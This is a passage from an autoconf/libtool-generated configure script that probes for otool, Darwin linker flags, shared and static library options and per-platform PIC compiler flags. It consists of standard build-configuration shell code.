do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_OTOOL="otool" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_OTOOL=$ac_cv_prog_ac_ct_OTOOL if test -n "$ac_ct_OTOOL"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_OTOOL" >&5 $as_echo "$ac_ct_OTOOL" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_OTOOL" = x; then OTOOL=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac OTOOL=$ac_ct_OTOOL fi else OTOOL="$ac_cv_prog_OTOOL" fi if test -n "$ac_tool_prefix"; then # Extract the first word of "${ac_tool_prefix}otool64", so it can be a program name with args. set dummy ${ac_tool_prefix}otool64; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_OTOOL64+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$OTOOL64"; then ac_cv_prog_OTOOL64="$OTOOL64" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_OTOOL64="${ac_tool_prefix}otool64" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi OTOOL64=$ac_cv_prog_OTOOL64 if test -n "$OTOOL64"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $OTOOL64" >&5 $as_echo "$OTOOL64" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi fi if test -z "$ac_cv_prog_OTOOL64"; then ac_ct_OTOOL64=$OTOOL64 # Extract the first word of "otool64", so it can be a program name with args. set dummy otool64; ac_word=$2 { $as_echo "$as_me:${as_lineno-$LINENO}: checking for $ac_word" >&5 $as_echo_n "checking for $ac_word... " >&6; } if ${ac_cv_prog_ac_ct_OTOOL64+:} false; then : $as_echo_n "(cached) " >&6 else if test -n "$ac_ct_OTOOL64"; then ac_cv_prog_ac_ct_OTOOL64="$ac_ct_OTOOL64" # Let the user override the test. else as_save_IFS=$IFS; IFS=$PATH_SEPARATOR for as_dir in $PATH do IFS=$as_save_IFS test -z "$as_dir" && as_dir=. for ac_exec_ext in '' $ac_executable_extensions; do if as_fn_executable_p "$as_dir/$ac_word$ac_exec_ext"; then ac_cv_prog_ac_ct_OTOOL64="otool64" $as_echo "$as_me:${as_lineno-$LINENO}: found $as_dir/$ac_word$ac_exec_ext" >&5 break 2 fi done done IFS=$as_save_IFS fi fi ac_ct_OTOOL64=$ac_cv_prog_ac_ct_OTOOL64 if test -n "$ac_ct_OTOOL64"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $ac_ct_OTOOL64" >&5 $as_echo "$ac_ct_OTOOL64" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test "x$ac_ct_OTOOL64" = x; then OTOOL64=":" else case $cross_compiling:$ac_tool_warned in yes:) { $as_echo "$as_me:${as_lineno-$LINENO}: WARNING: using cross tools not prefixed with host triplet" >&5 $as_echo "$as_me: WARNING: using cross tools not prefixed with host triplet" >&2;} ac_tool_warned=yes ;; esac OTOOL64=$ac_ct_OTOOL64 fi else OTOOL64="$ac_cv_prog_OTOOL64" fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for -single_module linker flag" >&5 $as_echo_n "checking for -single_module linker flag... " >&6; } if ${lt_cv_apple_cc_single_mod+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_apple_cc_single_mod=no if test -z "$LT_MULTI_MODULE"; then # By default we will add the -single_module flag. You can override # by either setting the environment variable LT_MULTI_MODULE # non-empty at configure time, or by adding -multi_module to the # link flags. rm -rf libconftest.dylib* echo "int foo(void){return 1;}" > conftest.c echo "$LTCC $LTCFLAGS $LDFLAGS -o libconftest.dylib \ -dynamiclib -Wl,-single_module conftest.c" >&5 $LTCC $LTCFLAGS $LDFLAGS -o libconftest.dylib \ -dynamiclib -Wl,-single_module conftest.c 2>conftest.err _lt_result=$? # If there is a non-empty error log, and "single_module" # appears in it, assume the flag caused a linker warning if test -s conftest.err && $GREP single_module conftest.err; then cat conftest.err >&5 # Otherwise, if the output was created with a 0 exit code from # the compiler, it worked. elif test -f libconftest.dylib && test 0 = "$_lt_result"; then lt_cv_apple_cc_single_mod=yes else cat conftest.err >&5 fi rm -rf libconftest.dylib* rm -f conftest.* fi fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_apple_cc_single_mod" >&5 $as_echo "$lt_cv_apple_cc_single_mod" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking for -exported_symbols_list linker flag" >&5 $as_echo_n "checking for -exported_symbols_list linker flag... " >&6; } if ${lt_cv_ld_exported_symbols_list+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_ld_exported_symbols_list=no save_LDFLAGS=$LDFLAGS echo "_main" > conftest.sym LDFLAGS="$LDFLAGS -Wl,-exported_symbols_list,conftest.sym" cat confdefs.h - <<_ACEOF >conftest.$ac_ext /* end confdefs.h. */ int main () { ; return 0; } _ACEOF if ac_fn_c_try_link "$LINENO"; then : lt_cv_ld_exported_symbols_list=yes else lt_cv_ld_exported_symbols_list=no fi rm -f core conftest.err conftest.$ac_objext \ conftest$ac_exeext conftest.$ac_ext LDFLAGS=$save_LDFLAGS fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_ld_exported_symbols_list" >&5 $as_echo "$lt_cv_ld_exported_symbols_list" >&6; } { $as_echo "$as_me:${as_lineno-$LINENO}: checking for -force_load linker flag" >&5 $as_echo_n "checking for -force_load linker flag... " >&6; } if ${lt_cv_ld_force_load+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_ld_force_load=no cat > conftest.c << _LT_EOF int forced_loaded() { return 2;} _LT_EOF echo "$LTCC $LTCFLAGS -c -o conftest.o conftest.c" >&5 $LTCC $LTCFLAGS -c -o conftest.o conftest.c 2>&5 echo "$AR $AR_FLAGS libconftest.a conftest.o" >&5 $AR $AR_FLAGS libconftest.a conftest.o 2>&5 echo "$RANLIB libconftest.a" >&5 $RANLIB libconftest.a 2>&5 cat > conftest.c << _LT_EOF int main() { return 0;} _LT_EOF echo "$LTCC $LTCFLAGS $LDFLAGS -o conftest conftest.c -Wl,-force_load,./libconftest.a" >&5 $LTCC $LTCFLAGS $LDFLAGS -o conftest conftest.c -Wl,-force_load,./libconftest.a 2>conftest.err _lt_result=$? if test -s conftest.err && $GREP force_load conftest.err; then cat conftest.err >&5 elif test -f conftest && test 0 = "$_lt_result" && $GREP forced_load conftest >/dev/null 2>&1; then lt_cv_ld_force_load=yes else cat conftest.err >&5 fi rm -f conftest.err libconftest.a conftest conftest.c rm -rf conftest.dSYM fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_ld_force_load" >&5 $as_echo "$lt_cv_ld_force_load" >&6; } case $host_os in rhapsody* | darwin1.[012]) _lt_dar_allow_undefined='$wl-undefined ${wl}suppress' ;; darwin1.*) _lt_dar_allow_undefined='$wl-flat_namespace $wl-undefined ${wl}suppress' ;; darwin*) # darwin 5.x on # if running on 10.5 or later, the deployment target defaults # to the OS version, if on x86, and 10.4, the deployment # target defaults to 10.4. Don't you love it? case ${MACOSX_DEPLOYMENT_TARGET-10.0},$host in 10.0,*86*-darwin8*|10.0,*-darwin[91]*) _lt_dar_allow_undefined='$wl-undefined ${wl}dynamic_lookup' ;; 10.[012][,.]*) _lt_dar_allow_undefined='$wl-flat_namespace $wl-undefined ${wl}suppress' ;; 10.*) _lt_dar_allow_undefined='$wl-undefined ${wl}dynamic_lookup' ;; esac ;; esac if test yes = "$lt_cv_apple_cc_single_mod"; then _lt_dar_single_mod='$single_module' fi if test yes = "$lt_cv_ld_exported_symbols_list"; then _lt_dar_export_syms=' $wl-exported_symbols_list,$output_objdir/$libname-symbols.expsym' else _lt_dar_export_syms='~$NMEDIT -s $output_objdir/$libname-symbols.expsym $lib' fi if test : != "$DSYMUTIL" && test no = "$lt_cv_ld_force_load"; then _lt_dsymutil='~$DSYMUTIL $lib || :' else _lt_dsymutil= fi ;; esac # func_munge_path_list VARIABLE PATH # ----------------------------------- # VARIABLE is name of variable containing _space_ separated list of # directories to be munged by the contents of PATH, which is string # having a format: # "DIR[:DIR]:" # string "DIR[ DIR]" will be prepended to VARIABLE # ":DIR[:DIR]" # string "DIR[ DIR]" will be appended to VARIABLE # "DIRP[:DIRP]::[DIRA:]DIRA" # string "DIRP[ DIRP]" will be prepended to VARIABLE and string # "DIRA[ DIRA]" will be appended to VARIABLE # "DIR[:DIR]" # VARIABLE will be replaced by "DIR[ DIR]" func_munge_path_list () { case x$2 in x) ;; *:) eval $1=\"`$ECHO $2 | $SED 's/:/ /g'` \$$1\" ;; x:*) eval $1=\"\$$1 `$ECHO $2 | $SED 's/:/ /g'`\" ;; *::*) eval $1=\"\$$1\ `$ECHO $2 | $SED -e 's/.*:://' -e 's/:/ /g'`\" eval $1=\"`$ECHO $2 | $SED -e 's/::.*//' -e 's/:/ /g'`\ \$$1\" ;; *) eval $1=\"`$ECHO $2 | $SED 's/:/ /g'`\" ;; esac } for ac_header in dlfcn.h do : ac_fn_c_check_header_compile "$LINENO" "dlfcn.h" "ac_cv_header_dlfcn_h" "$ac_includes_default " if test "x$ac_cv_header_dlfcn_h" = xyes; then : cat >>confdefs.h <<_ACEOF #define HAVE_DLFCN_H 1 _ACEOF fi done func_stripname_cnf () { case $2 in .*) func_stripname_result=`$ECHO "$3" | $SED "s%^$1%%; s%\\\\$2\$%%"`;; *) func_stripname_result=`$ECHO "$3" | $SED "s%^$1%%; s%$2\$%%"`;; esac } # func_stripname_cnf # Set options enable_dlopen=yes enable_win32_dll=no # Check whether --enable-shared was given. if test "${enable_shared+set}" = set; then : enableval=$enable_shared; p=${PACKAGE-default} case $enableval in yes) enable_shared=yes ;; no) enable_shared=no ;; *) enable_shared=no # Look at the argument we got. We use all the common list separators. lt_save_ifs=$IFS; IFS=$IFS$PATH_SEPARATOR, for pkg in $enableval; do IFS=$lt_save_ifs if test "X$pkg" = "X$p"; then enable_shared=yes fi done IFS=$lt_save_ifs ;; esac else enable_shared=yes fi # Check whether --enable-static was given. if test "${enable_static+set}" = set; then : enableval=$enable_static; p=${PACKAGE-default} case $enableval in yes) enable_static=yes ;; no) enable_static=no ;; *) enable_static=no # Look at the argument we got. We use all the common list separators. lt_save_ifs=$IFS; IFS=$IFS$PATH_SEPARATOR, for pkg in $enableval; do IFS=$lt_save_ifs if test "X$pkg" = "X$p"; then enable_static=yes fi done IFS=$lt_save_ifs ;; esac else enable_static=yes fi # Check whether --with-pic was given. if test "${with_pic+set}" = set; then : withval=$with_pic; lt_p=${PACKAGE-default} case $withval in yes|no) pic_mode=$withval ;; *) pic_mode=default # Look at the argument we got. We use all the common list separators. lt_save_ifs=$IFS; IFS=$IFS$PATH_SEPARATOR, for lt_pkg in $withval; do IFS=$lt_save_ifs if test "X$lt_pkg" = "X$lt_p"; then pic_mode=yes fi done IFS=$lt_save_ifs ;; esac else pic_mode=default fi # Check whether --enable-fast-install was given. if test "${enable_fast_install+set}" = set; then : enableval=$enable_fast_install; p=${PACKAGE-default} case $enableval in yes) enable_fast_install=yes ;; no) enable_fast_install=no ;; *) enable_fast_install=no # Look at the argument we got. We use all the common list separators. lt_save_ifs=$IFS; IFS=$IFS$PATH_SEPARATOR, for pkg in $enableval; do IFS=$lt_save_ifs if test "X$pkg" = "X$p"; then enable_fast_install=yes fi done IFS=$lt_save_ifs ;; esac else enable_fast_install=yes fi shared_archive_member_spec= case $host,$enable_shared in power*-*-aix[5-9]*,yes) { $as_echo "$as_me:${as_lineno-$LINENO}: checking which variant of shared library versioning to provide" >&5 $as_echo_n "checking which variant of shared library versioning to provide... " >&6; } # Check whether --with-aix-soname was given. if test "${with_aix_soname+set}" = set; then : withval=$with_aix_soname; case $withval in aix|svr4|both) ;; *) as_fn_error $? "Unknown argument to --with-aix-soname" "$LINENO" 5 ;; esac lt_cv_with_aix_soname=$with_aix_soname else if ${lt_cv_with_aix_soname+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_with_aix_soname=aix fi with_aix_soname=$lt_cv_with_aix_soname fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $with_aix_soname" >&5 $as_echo "$with_aix_soname" >&6; } if test aix != "$with_aix_soname"; then # For the AIX way of multilib, we name the shared archive member # based on the bitwidth used, traditionally 'shr.o' or 'shr_64.o', # and 'shr.imp' or 'shr_64.imp', respectively, for the Import File. # Even when GNU compilers ignore OBJECT_MODE but need '-maix64' flag, # the AIX toolchain works better with OBJECT_MODE set (default 32). if test 64 = "${OBJECT_MODE-32}"; then shared_archive_member_spec=shr_64 else shared_archive_member_spec=shr fi fi ;; *) with_aix_soname=aix ;; esac # This can be used to rebuild libtool when needed LIBTOOL_DEPS=$ltmain # Always use our own libtool. LIBTOOL='$(SHELL) $(top_builddir)/libtool' test -z "$LN_S" && LN_S="ln -s" if test -n "${ZSH_VERSION+set}"; then setopt NO_GLOB_SUBST fi { $as_echo "$as_me:${as_lineno-$LINENO}: checking for objdir" >&5 $as_echo_n "checking for objdir... " >&6; } if ${lt_cv_objdir+:} false; then : $as_echo_n "(cached) " >&6 else rm -f .libs 2>/dev/null mkdir .libs 2>/dev/null if test -d .libs; then lt_cv_objdir=.libs else # MS-DOS does not allow filenames that begin with a dot. lt_cv_objdir=_libs fi rmdir .libs 2>/dev/null fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_objdir" >&5 $as_echo "$lt_cv_objdir" >&6; } objdir=$lt_cv_objdir cat >>confdefs.h <<_ACEOF #define LT_OBJDIR "$lt_cv_objdir/" _ACEOF case $host_os in aix3*) # AIX sometimes has problems with the GCC collect2 program. For some # reason, if we set the COLLECT_NAMES environment variable, the problems # vanish in a puff of smoke. if test set != "${COLLECT_NAMES+set}"; then COLLECT_NAMES= export COLLECT_NAMES fi ;; esac # Global variables: ofile=libtool can_build_shared=yes # All known linkers require a '.a' archive for static linking (except MSVC and # ICC, which need '.lib'). libext=a with_gnu_ld=$lt_cv_prog_gnu_ld old_CC=$CC old_CFLAGS=$CFLAGS # Set sane defaults for various variables test -z "$CC" && CC=cc test -z "$LTCC" && LTCC=$CC test -z "$LTCFLAGS" && LTCFLAGS=$CFLAGS test -z "$LD" && LD=ld test -z "$ac_objext" && ac_objext=o func_cc_basename $compiler cc_basename=$func_cc_basename_result # Only perform the check for file, if the check method requires it test -z "$MAGIC_CMD" && MAGIC_CMD=file case $deplibs_check_method in file_magic*) if test "$file_magic_cmd" = '$MAGIC_CMD'; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking for ${ac_tool_prefix}file" >&5 $as_echo_n "checking for ${ac_tool_prefix}file... " >&6; } if ${lt_cv_path_MAGIC_CMD+:} false; then : $as_echo_n "(cached) " >&6 else case $MAGIC_CMD in [\\/*] | ?:[\\/]*) lt_cv_path_MAGIC_CMD=$MAGIC_CMD # Let the user override the test with a path. ;; *) lt_save_MAGIC_CMD=$MAGIC_CMD lt_save_ifs=$IFS; IFS=$PATH_SEPARATOR ac_dummy="/usr/bin$PATH_SEPARATOR$PATH" for ac_dir in $ac_dummy; do IFS=$lt_save_ifs test -z "$ac_dir" && ac_dir=. if test -f "$ac_dir/${ac_tool_prefix}file"; then lt_cv_path_MAGIC_CMD=$ac_dir/"${ac_tool_prefix}file" if test -n "$file_magic_test_file"; then case $deplibs_check_method in "file_magic "*) file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"` MAGIC_CMD=$lt_cv_path_MAGIC_CMD if eval $file_magic_cmd \$file_magic_test_file 2> /dev/null | $EGREP "$file_magic_regex" > /dev/null; then : else cat <<_LT_EOF 1>&2 *** Warning: the command libtool uses to detect shared libraries, *** $file_magic_cmd, produces output that libtool cannot recognize. *** The result is that libtool may fail to recognize shared libraries *** as such. This will affect the creation of libtool libraries that *** depend on shared libraries, but programs linked with such libtool *** libraries will work regardless of this problem. Nevertheless, you *** may want to report the problem to your system manager and/or to *** bug-libtool@gnu.org _LT_EOF fi ;; esac fi break fi done IFS=$lt_save_ifs MAGIC_CMD=$lt_save_MAGIC_CMD ;; esac fi MAGIC_CMD=$lt_cv_path_MAGIC_CMD if test -n "$MAGIC_CMD"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $MAGIC_CMD" >&5 $as_echo "$MAGIC_CMD" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi if test -z "$lt_cv_path_MAGIC_CMD"; then if test -n "$ac_tool_prefix"; then { $as_echo "$as_me:${as_lineno-$LINENO}: checking for file" >&5 $as_echo_n "checking for file... " >&6; } if ${lt_cv_path_MAGIC_CMD+:} false; then : $as_echo_n "(cached) " >&6 else case $MAGIC_CMD in [\\/*] | ?:[\\/]*) lt_cv_path_MAGIC_CMD=$MAGIC_CMD # Let the user override the test with a path. ;; *) lt_save_MAGIC_CMD=$MAGIC_CMD lt_save_ifs=$IFS; IFS=$PATH_SEPARATOR ac_dummy="/usr/bin$PATH_SEPARATOR$PATH" for ac_dir in $ac_dummy; do IFS=$lt_save_ifs test -z "$ac_dir" && ac_dir=. if test -f "$ac_dir/file"; then lt_cv_path_MAGIC_CMD=$ac_dir/"file" if test -n "$file_magic_test_file"; then case $deplibs_check_method in "file_magic "*) file_magic_regex=`expr "$deplibs_check_method" : "file_magic \(.*\)"` MAGIC_CMD=$lt_cv_path_MAGIC_CMD if eval $file_magic_cmd \$file_magic_test_file 2> /dev/null | $EGREP "$file_magic_regex" > /dev/null; then : else cat <<_LT_EOF 1>&2 *** Warning: the command libtool uses to detect shared libraries, *** $file_magic_cmd, produces output that libtool cannot recognize. *** The result is that libtool may fail to recognize shared libraries *** as such. This will affect the creation of libtool libraries that *** depend on shared libraries, but programs linked with such libtool *** libraries will work regardless of this problem. Nevertheless, you *** may want to report the problem to your system manager and/or to *** bug-libtool@gnu.org _LT_EOF fi ;; esac fi break fi done IFS=$lt_save_ifs MAGIC_CMD=$lt_save_MAGIC_CMD ;; esac fi MAGIC_CMD=$lt_cv_path_MAGIC_CMD if test -n "$MAGIC_CMD"; then { $as_echo "$as_me:${as_lineno-$LINENO}: result: $MAGIC_CMD" >&5 $as_echo "$MAGIC_CMD" >&6; } else { $as_echo "$as_me:${as_lineno-$LINENO}: result: no" >&5 $as_echo "no" >&6; } fi else MAGIC_CMD=: fi fi fi ;; esac # Use C for the default configuration in the libtool script lt_save_CC=$CC ac_ext=c ac_cpp='$CPP $CPPFLAGS' ac_compile='$CC -c $CFLAGS $CPPFLAGS conftest.$ac_ext >&5' ac_link='$CC -o conftest$ac_exeext $CFLAGS $CPPFLAGS $LDFLAGS conftest.$ac_ext $LIBS >&5' ac_compiler_gnu=$ac_cv_c_compiler_gnu # Source file extension for C test sources. ac_ext=c # Object file extension for compiled C test sources. objext=o objext=$objext # Code to be used in simple compile tests lt_simple_compile_test_code="int some_variable = 0;" # Code to be used in simple link tests lt_simple_link_test_code='int main(){return(0);}' # If no C compiler was specified, use CC. LTCC=${LTCC-"$CC"} # If no C compiler flags were specified, use CFLAGS. LTCFLAGS=${LTCFLAGS-"$CFLAGS"} # Allow CC to be a program name with arguments. compiler=$CC # Save the default compiler, since it gets overwritten when the other # tags are being tested, and _LT_TAGVAR(compiler, []) is a NOP. compiler_DEFAULT=$CC # save warnings/boilerplate of simple test code ac_outfile=conftest.$ac_objext echo "$lt_simple_compile_test_code" >conftest.$ac_ext eval "$ac_compile" 2>&1 >/dev/null | $SED '/^$/d; /^ *+/d' >conftest.err _lt_compiler_boilerplate=`cat conftest.err` $RM conftest* ac_outfile=conftest.$ac_objext echo "$lt_simple_link_test_code" >conftest.$ac_ext eval "$ac_link" 2>&1 >/dev/null | $SED '/^$/d; /^ *+/d' >conftest.err _lt_linker_boilerplate=`cat conftest.err` $RM -r conftest* ## CAVEAT EMPTOR: ## There is no encapsulation within the following macros, do not change ## the running order or otherwise move them around unless you know exactly ## what you are doing... if test -n "$compiler"; then lt_prog_compiler_no_builtin_flag= if test yes = "$GCC"; then case $cc_basename in nvcc*) lt_prog_compiler_no_builtin_flag=' -Xcompiler -fno-builtin' ;; *) lt_prog_compiler_no_builtin_flag=' -fno-builtin' ;; esac { $as_echo "$as_me:${as_lineno-$LINENO}: checking if $compiler supports -fno-rtti -fno-exceptions" >&5 $as_echo_n "checking if $compiler supports -fno-rtti -fno-exceptions... " >&6; } if ${lt_cv_prog_compiler_rtti_exceptions+:} false; then : $as_echo_n "(cached) " >&6 else lt_cv_prog_compiler_rtti_exceptions=no ac_outfile=conftest.$ac_objext echo "$lt_simple_compile_test_code" > conftest.$ac_ext lt_compiler_flag="-fno-rtti -fno-exceptions" ## exclude from sc_useless_quotes_in_assignment # Insert the option either (1) after the last *FLAGS variable, or # (2) before a word containing "conftest.", or (3) at the end. # Note that $ac_compile itself does not contain backslashes and begins # with a dollar sign (not a hyphen), so the echo should work correctly. # The option is referenced via a variable to avoid confusing sed. lt_compile=`echo "$ac_compile" | $SED \ -e 's:.*FLAGS}\{0,1\} :&$lt_compiler_flag :; t' \ -e 's: [^ ]*conftest\.: $lt_compiler_flag&:; t' \ -e 's:$: $lt_compiler_flag:'` (eval echo "\"\$as_me:$LINENO: $lt_compile\"" >&5) (eval "$lt_compile" 2>conftest.err) ac_status=$? cat conftest.err >&5 echo "$as_me:$LINENO: \$? = $ac_status" >&5 if (exit $ac_status) && test -s "$ac_outfile"; then # The compiler can only warn and ignore the option if not recognized # So say no if there are warnings other than the usual output. $ECHO "$_lt_compiler_boilerplate" | $SED '/^$/d' >conftest.exp $SED '/^$/d; /^ *+/d' conftest.err >conftest.er2 if test ! -s conftest.er2 || diff conftest.exp conftest.er2 >/dev/null; then lt_cv_prog_compiler_rtti_exceptions=yes fi fi $RM conftest* fi { $as_echo "$as_me:${as_lineno-$LINENO}: result: $lt_cv_prog_compiler_rtti_exceptions" >&5 $as_echo "$lt_cv_prog_compiler_rtti_exceptions" >&6; } if test yes = "$lt_cv_prog_compiler_rtti_exceptions"; then lt_prog_compiler_no_builtin_flag="$lt_prog_compiler_no_builtin_flag -fno-rtti -fno-exceptions" else : fi fi lt_prog_compiler_wl= lt_prog_compiler_pic= lt_prog_compiler_static= if test yes = "$GCC"; then lt_prog_compiler_wl='-Wl,' lt_prog_compiler_static='-static' case $host_os in aix*) # All AIX code is PIC. if test ia64 = "$host_cpu"; then # AIX 5 now supports IA64 processor lt_prog_compiler_static='-Bstatic' fi lt_prog_compiler_pic='-fPIC' ;; amigaos*) case $host_cpu in powerpc) # see comment about AmigaOS4 .so support lt_prog_compiler_pic='-fPIC' ;; m68k) # FIXME: we need at least 68020 code to build shared libraries, but # adding the '-m68020' flag to GCC prevents building anything better, # like '-m68040'. lt_prog_compiler_pic='-m68020 -resident32 -malways-restore-a4' ;; esac ;; beos* | irix5* | irix6* | nonstopux* | osf3* | osf4* | osf5*) # PIC is the default for these OSes. ;; mingw* | cygwin* | pw32* | os2* | cegcc*) # This hack is so that the source file can tell whether it is being # built for inclusion in a dll (and should export symbols for example). # Although the cygwin gcc ignores -fPIC, still need this for old-style # (--disable-auto-import) libraries lt_prog_compiler_pic='-DDLL_EXPORT' case $host_os in os2*) lt_prog_compiler_static='$wl-static' ;; esac ;; darwin* | rhapsody*) # PIC is the default on this platform # Common symbols not allowed in MH_DYLIB files lt_prog_compiler_pic='-fno-common' ;; haiku*) # PIC is the default for Haiku. # The "-static" flag exists, but is broken. lt_prog_compiler_static= ;; hpux*) # PIC is the default for 64-bit PA HP-UX, but not for 32-bit # PA HP-UX. On IA64 HP-UX, PIC is the default but the pic flag # sets the default TLS model and affects inlining. case $host_cpu in hppa*64*) # +Z the default ;; *) lt_prog_compiler_pic='-fPIC' ;; esac ;; interix[3-9]*) # Interix 3.x gcc -fpic/-fPIC options generate broken code. # Instead, we relocate shared libraries at runtime. ;; msdosdjgpp*) # Just because we use GCC doesn't mean we suddenly get shared libraries # on systems that don't support them. lt_prog_compiler_can_build_shared=no enable_shared=no ;; *nto* | *qnx*) # QNX uses GNU C++, but need to define -shared option too, otherwise # it will coredump. lt_prog_compiler_pic='-fPIC -shared' ;; sysv4*MP*) if test -d /usr/nec; then lt_prog_compiler_pic=-Kconform_pic fi ;; *) lt_prog_compiler_pic='-fPIC' ;; esac case $cc_basename in nvcc*) # Cuda Compiler Driver 2.2 lt_prog_compiler_wl='-Xlinker ' if test -n "$lt_prog_compiler_pic"; then lt_prog_compiler_pic="-Xcompiler $lt_prog_compiler_pic" fi ;; esac else # PORTME Check for flag to pass linker flags through the system compiler. case $host_os in aix*) lt_prog_compiler_wl='-Wl,' if test ia64 = "$host_cpu"; then # AIX 5 now supports IA64 processor lt_prog_compiler_static='-Bstatic' else lt_prog_compiler_static='-bnso -bI:/lib/syscalls.exp' fi ;; darwin* | rhapsody*) # PIC is the default on this platform # Common symbols not allowed in MH_DYLIB files lt_prog_compiler_pic='-fno-common' case $cc_basename in nagfor*) # NAG Fortran compiler lt_prog_compiler_wl='-Wl,-Wl,,' lt_prog_compiler_pic='-PIC' lt_prog_compiler_static='-Bstatic' ;; esac ;; mingw* | cygwin* | pw32* | os2* | cegcc*) # This hack is so that the source file can tell whether it is being # built for inclusion in a dll (and should export symbols for example). lt_prog_compiler_pic='-DDLL_EXPORT' case $host_os in os2*) lt_prog_compiler_static='$wl-static' ;; esac ;; hpux9* | hpux10* | hpux11*) lt_prog_compiler_wl='-Wl,' # PIC is the default for IA64 HP-UX and 64-bit HP-UX, but # not for PA HP-UX. case $host_cpu in hppa*64*|ia64*) # +Z the default ;; *) lt_prog_compiler_pic='+Z' ;; esac # Is there a better lt_prog_compiler_static that works with the bundled CC? lt_prog_compiler_static='$wl-a ${wl}archive' ;; irix5* | irix6* | nonstopux*) lt_prog_compiler_wl='-Wl,' # PIC (with -KPIC) is the default. lt_prog_compiler_static='-non_shared' ;; linux* | k*bsd*-gnu | kopensolaris*-gnu | gnu*) case $cc_basename in # old Intel for x86_64, which still supported -KPIC. ecc*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-KPIC' lt_prog_compiler_static='-static' ;; # icc used to be incompatible with GCC. # ICC 10 doesn't accept -KPIC any more. icc* | ifort*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-fPIC' lt_prog_compiler_static='-static' ;; # Lahey Fortran 8.1. lf95*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='--shared' lt_prog_compiler_static='--static' ;; nagfor*) # NAG Fortran compiler lt_prog_compiler_wl='-Wl,-Wl,,' lt_prog_compiler_pic='-PIC' lt_prog_compiler_static='-Bstatic' ;; tcc*) # Fabrice Bellard et al's Tiny C Compiler lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-fPIC' lt_prog_compiler_static='-static' ;; pgcc* | pgf77* | pgf90* | pgf95* | pgfortran*) # Portland Group compilers (*not* the Pentium gcc compiler, # which looks to be a dead project) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-fpic' lt_prog_compiler_static='-Bstatic' ;; ccc*) lt_prog_compiler_wl='-Wl,' # All Alpha code is PIC. lt_prog_compiler_static='-non_shared' ;; xl* | bgxl* | bgf* | mpixl*) # IBM XL C 8.0/Fortran 10.1, 11.1 on PPC and BlueGene lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-qpic' lt_prog_compiler_static='-qstaticlink' ;; *) case `$CC -V 2>&1 | sed 5q` in *Sun\ Ceres\ Fortran* | *Sun*Fortran*\ [1-7].* | *Sun*Fortran*\ 8.[0-3]*) # Sun Fortran 8.3 passes all unrecognized flags to the linker lt_prog_compiler_pic='-KPIC' lt_prog_compiler_static='-Bstatic' lt_prog_compiler_wl='' ;; *Sun\ F* | *Sun*Fortran*) lt_prog_compiler_pic='-KPIC' lt_prog_compiler_static='-Bstatic' lt_prog_compiler_wl='-Qoption ld ' ;; *Sun\ C*) # Sun C 5.9 lt_prog_compiler_pic='-KPIC' lt_prog_compiler_static='-Bstatic' lt_prog_compiler_wl='-Wl,' ;; *Intel*\ [CF]*Compiler*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-fPIC' lt_prog_compiler_static='-static' ;; *Portland\ Group*) lt_prog_compiler_wl='-Wl,' lt_prog_compiler_pic='-fpic' lt_prog_compiler_static='-Bstatic' ;; esac ;; esac ;; newsos6) lt_prog_compiler_pic='-KPIC' lt_prog_compiler_static='-Bstatic' ;; *nto* | *qnx*) # QNX uses GNU C++, but need to define -shared option too, otherwise # it will coredump. lt_prog_compiler_pic='-fPIC -shared' ;; osf3* | osf4* | osf5*) lt_prog_compiler_wl='-Wl,' # All OSF/1 code is PIC. lt_prog_compiler_static='-non_shared' ;; rdos*) lt_prog_compiler_static='-non_shared' ;; solaris*) lt_prog_compiler_pic='-KPIC' 